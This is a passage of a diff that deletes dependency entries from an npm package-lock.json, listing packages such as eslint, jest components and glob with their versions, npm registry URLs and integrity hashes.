"https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" - }, - "cosmiconfig": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-7.1.0.tgz", - "integrity": "sha512-AdmX6xUzdNASswsFtmwSt7Vj8po9IuqXm0UXz7QKPuEUmPB4XyjGfaAr2PSuELMwkRMVH1EpIkX5bTZGRB3eCA==", - "dev": true, - "requires": { - "@types/parse-json": "^4.0.0", - "import-fresh": "^3.2.1", - "parse-json": "^5.0.0", - "path-type": "^4.0.0", - "yaml": "^1.10.0" - } - }, - "create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - } - }, - "cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "debug": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.2.tgz", - "integrity": "sha512-mOp8wKcvj7XxC78zLgw/ZA+6TSgkoE2C/ienthhRD298T7UNwAg9diBpLRxC0mOezLl4B0xV7M0cCO6P/O0Xhw==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "requires": {} - }, - "deep-is": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.3.tgz", - "integrity": "sha1-s2nW+128E+7PUk+RsHD+7cNXzzQ=", - "dev": true, - "peer": true - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true - }, - "doctrine": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/doctrine/-/doctrine-3.0.0.tgz", - "integrity": "sha512-yS+Q5i3hBf7GBkd4KG8a7eBNNWNGLTaEwwYWUijIYM7zrlYDM0BFXHjjPWlWZ1Rg7UaddZeIDmi9jF3HmqiQ2w==", - "dev": true, - "peer": true, - "requires": { - "esutils": "^2.0.2" - } - }, - "dot-prop": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/dot-prop/-/dot-prop-6.0.1.tgz", - "integrity": "sha512-tE7ztYzXHIeyvc7N+hR3oi7FIbf/NIjVP9hmAt3yMXzrQ072/fpjGLx2GxNxGxUl5V73MEqYzioOMoVhGMJ5cA==", - "dev": true, - "requires": { - "is-obj": "^2.0.0" - } - }, - "eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", - "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "ejs": { - "version": "3.1.10", - "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", - "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", - "dev": true, - "requires": { - "jake": "^10.8.5" - } - }, - "electron-to-chromium": { - "version": "1.4.737", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.737.tgz", - "integrity": "sha512-QvLTxaLHKdy5YxvixAw/FfHq2eWLUL9KvsPjp0aHK1gI5d3EDuDgITkvj0nFO2c6zUY3ZqVAJQiBYyQP9tQpfw==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "enquirer": { - "version": "2.3.6", - "resolved": "https://registry.npmjs.org/enquirer/-/enquirer-2.3.6.tgz", - "integrity": "sha512-yjNnPr315/FjS4zIsUxYguYUPP2e1NK4d7E7ZOLiyYCcbFBiTMyID+2wvm2w6+pZ/odMA7cRkjhsPbltwBOrLg==", - "dev": true, - "peer": true, - "requires": { - "ansi-colors": "^4.1.1" - } - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.2.tgz", - "integrity": "sha512-ErCHMCae19vR8vQGe50xIsVomy19rg6gFu3+r3jkEO46suLMWBksvVyoGgQV+jOfl84ZSOSlmv6Gxa89PmTGmA==", - "dev": true - }, - "escape-string-regexp": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", - "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==", - "dev": true, - "peer": true - }, - "eslint": { - "version": "7.32.0", - "resolved": "https://registry.npmjs.org/eslint/-/eslint-7.32.0.tgz", - "integrity": "sha512-VHZ8gX+EDfz+97jGcgyGCyRia/dPOd6Xh9yPv8Bl1+SoaIwD+a/vlrOmGRUyOYu7MwUhc7CxqeaDZU13S4+EpA==", - "dev": true, - "peer": true, - "requires": { - "@babel/code-frame": "7.12.11", - "@eslint/eslintrc": "^0.4.3", - "@humanwhocodes/config-array": "^0.5.0", - "ajv": "^6.10.0", - "chalk": "^4.0.0", - "cross-spawn": "^7.0.2", - "debug": "^4.0.1", - "doctrine": "^3.0.0", - "enquirer": "^2.3.5", - "escape-string-regexp": "^4.0.0", - "eslint-scope": "^5.1.1", - "eslint-utils": "^2.1.0", - "eslint-visitor-keys": "^2.0.0", - "espree": "^7.3.1", - "esquery": "^1.4.0", - "esutils": "^2.0.2", - "fast-deep-equal": "^3.1.3", - "file-entry-cache": "^6.0.1", - "functional-red-black-tree": "^1.0.1", - "glob-parent": "^5.1.2", - "globals": "^13.6.0", - "ignore": "^4.0.6", - "import-fresh": "^3.0.0", - "imurmurhash": "^0.1.4", - "is-glob": "^4.0.0", - "js-yaml": "^3.13.1", - "json-stable-stringify-without-jsonify": "^1.0.1", - "levn": "^0.4.1", - "lodash.merge": "^4.6.2", - "minimatch": "^3.0.4", - "natural-compare": "^1.4.0", - "optionator": "^0.9.1", - "progress": "^2.0.0", - "regexpp": "^3.1.0", - "semver": "^7.2.1", - "strip-ansi": "^6.0.0", - "strip-json-comments": "^3.1.0", - "table": "^6.0.9", - "text-table": "^0.2.0", - "v8-compile-cache": "^2.0.3" - } - }, - "eslint-scope": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-5.1.1.tgz", - "integrity": "sha512-2NxwbF/hZ0KpepYN0cNbo+FN6XoK7GaHlQhgx/hIZl6Va0bF45RQOOwhLIy8lQDbuCiadSLCBnH2CFYquit5bw==", - "dev": true, - "peer": true, - "requires": { - "esrecurse": "^4.3.0", - "estraverse": "^4.1.1" - } - }, - "eslint-utils": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/eslint-utils/-/eslint-utils-2.1.0.tgz", - "integrity": "sha512-w94dQYoauyvlDc43XnGB8lU3Zt713vNChgt4EWwhXAP2XkBvndfxF0AgIqKOOasjPIPzj9JqgwkwbCYD0/V3Zg==", - "dev": true, - "peer": true, - "requires": { - "eslint-visitor-keys": "^1.1.0" - }, - "dependencies": { - "eslint-visitor-keys": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-1.3.0.tgz", - "integrity": "sha512-6J72N8UNa462wa/KFODt/PJ3IU60SDpC3QXC1Hjc1BXXpfL2C9R5+AU7jhe0F6GREqVMh4Juu+NY7xn+6dipUQ==", - "dev": true, - "peer": true - } - } - }, - "eslint-visitor-keys": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-2.1.0.tgz", - "integrity": "sha512-0rSmRBzXgDzIsD6mGdJgevzgezI534Cer5L/vyMX0kHzT/jiB43jRhd9YUlMGYLQy2zprNmoT8qasCGtY+QaKw==", - "dev": true, - "peer": true - }, - "espree": { - "version": "7.3.1", - "resolved": "https://registry.npmjs.org/espree/-/espree-7.3.1.tgz", - "integrity": "sha512-v3JCNCE64umkFpmkFGqzVKsOT0tN1Zr+ueqLZfpV1Ob8e+CEgPWa+OxCoGH3tnhimMKIaBm4m/vaRpJ/krRz2g==", - "dev": true, - "peer": true, - "requires": { - "acorn": "^7.4.0", - "acorn-jsx": "^5.3.1", - "eslint-visitor-keys": "^1.3.0" - }, - "dependencies": { - "eslint-visitor-keys": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-1.3.0.tgz", - "integrity": "sha512-6J72N8UNa462wa/KFODt/PJ3IU60SDpC3QXC1Hjc1BXXpfL2C9R5+AU7jhe0F6GREqVMh4Juu+NY7xn+6dipUQ==", - "dev": true, - "peer": true - } - } - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "esquery": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/esquery/-/esquery-1.4.0.tgz", - "integrity": "sha512-cCDispWt5vHHtwMY2YrAQ4ibFkAL8RbH5YGBnZBc90MolvvfkkQcJro/aZiAQUlQ3qgrYS6D6v8Gc5G5CQsc9w==", - "dev": true, - "peer": true, - "requires": { - "estraverse": "^5.1.0" - }, - "dependencies": { - "estraverse": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.2.0.tgz", - "integrity": "sha512-BxbNGGNm0RyRYvUdHpIwv9IWzeM9XClbOxwoATuFdOE7ZE6wHL+HQ5T8hoPM+zHvmKzzsEqhgy0GrQ5X13afiQ==", - "dev": true, - "peer": true - } - } - }, - "esrecurse": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/esrecurse/-/esrecurse-4.3.0.tgz", - "integrity": "sha512-KmfKL3b6G+RXvP8N1vr3Tq1kL/oCFgn2NYXEtqP8/L3pKapUA4G8cFVaoF3SU323CD4XypR/ffioHmkti6/Tag==", - "dev": true, - "peer": true, - "requires": { - "estraverse": "^5.2.0" - }, - "dependencies": { - "estraverse": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.2.0.tgz", - "integrity": "sha512-BxbNGGNm0RyRYvUdHpIwv9IWzeM9XClbOxwoATuFdOE7ZE6wHL+HQ5T8hoPM+zHvmKzzsEqhgy0GrQ5X13afiQ==", - "dev": true, - "peer": true - } - } - }, - "estraverse": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-4.3.0.tgz", - "integrity": "sha512-39nnKffWz8xN1BU/2c79n9nB9HDzo0niYUqx6xyqUnyoAnQyyWpOTdZEeiCch8BBu515t4wp9ZmgVfVhn9EBpw==", - "dev": true, - "peer": true - }, - "esutils": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", - "integrity": "sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==", - "dev": true, - "peer": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" - }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "fast-levenshtein": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/fast-levenshtein/-/fast-levenshtein-2.0.6.tgz", - "integrity": "sha1-PYpcZog6FqMMqGQ+hR8Zuqd5eRc=", - "dev": true, - "peer": true - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "file-entry-cache": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/file-entry-cache/-/file-entry-cache-6.0.1.tgz", - "integrity": "sha512-7Gps/XWymbLk2QLYK4NzpMOrYjMhdIxXuIvy2QBsLE6ljuodKvdkWs/cpyJJ3CVIVpH0Oi1Hvg1ovbMzLdFBBg==", - "dev": true, - "peer": true, - "requires": { - "flat-cache": "^3.0.4" - } - }, - "filelist": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", - "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", - "dev": true, - "requires": { - "minimatch": "^5.0.1" - }, - "dependencies": { - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0" - } - }, - "minimatch": { - "version": "5.1.6", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", - "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", - "dev": true, - "requires": { - "brace-expansion": "^2.0.1" - } - } - } - }, - "fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "flat-cache": { - "version": "3.0.4", - "resolved": "https://registry.npmjs.org/flat-cache/-/flat-cache-3.0.4.tgz", - "integrity": "sha512-dm9s5Pw7Jc0GvMYbshN6zchCA9RgQlzzEZX3vylR9IqFfS8XciblUXOKfW6SiuJ0e13eDYZoZV5wdrev7P3Nwg==", - "dev": true, - "peer": true, - "requires": { - "flatted": "^3.1.0", - "rimraf": "^3.0.2" - } - }, - "flatted": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.2.2.tgz", - "integrity": "sha512-JaTY/wtrcSyvXJl4IMFHPKyFur1sE9AUqc0QnhOaJ0CxHtAoIV8pYDzeEfAaNEtGkOfq4gr3LBFmdXW5mOQFnA==", - "dev": true, - "peer": true - }, - "foreground-child": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.1.1.tgz", - "integrity": "sha512-TMKDUnIte6bfb5nWv7V/caI169OHgvwjb7V4WkeUvbQQdjr5rWKqHFiKWb/fcOwB+CzBT+qbWjvj+DVwRskpIg==", - "requires": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - }, - "dependencies": { - "signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==" - } - } - }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=", - "dev": true - }, - "fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true - }, - "functional-red-black-tree": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/functional-red-black-tree/-/functional-red-black-tree-1.0.1.tgz", - "integrity": "sha1-GwqzvVU7Kg1jmdKcDj6gslIHgyc=", - "dev": true, - "peer": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "glob": { - "version": "7.1.7", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.1.7.tgz", - "integrity": "sha512-OvD9ENzPLbegENnYP5UUfJIirTg4+XwMWGaQfQTY0JenxNvvIKP3U3/tAQSPIu/lHxXYSZmpXlUHeqAIdKzBLQ==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.0.4", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "glob-parent": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz", - "integrity": "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==", - "dev": true, - "peer": true, - "requires": { - "is-glob": "^4.0.1" - } - }, - "globals": { - "version": "13.10.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-13.10.0.tgz", - "integrity": "sha512-piHC3blgLGFjvOuMmWZX60f+na1lXFDhQXBf1UYp2fXPXqvEUbOhNwi6BsQ0bQishwedgnjkwv1d9zKf+MWw3g==", - "dev": true, - "peer": true, - "requires": { - "type-fest": "^0.20.2" - } - }, - "graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "requires": { - "function-bind": "^1.1.2" - } - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": 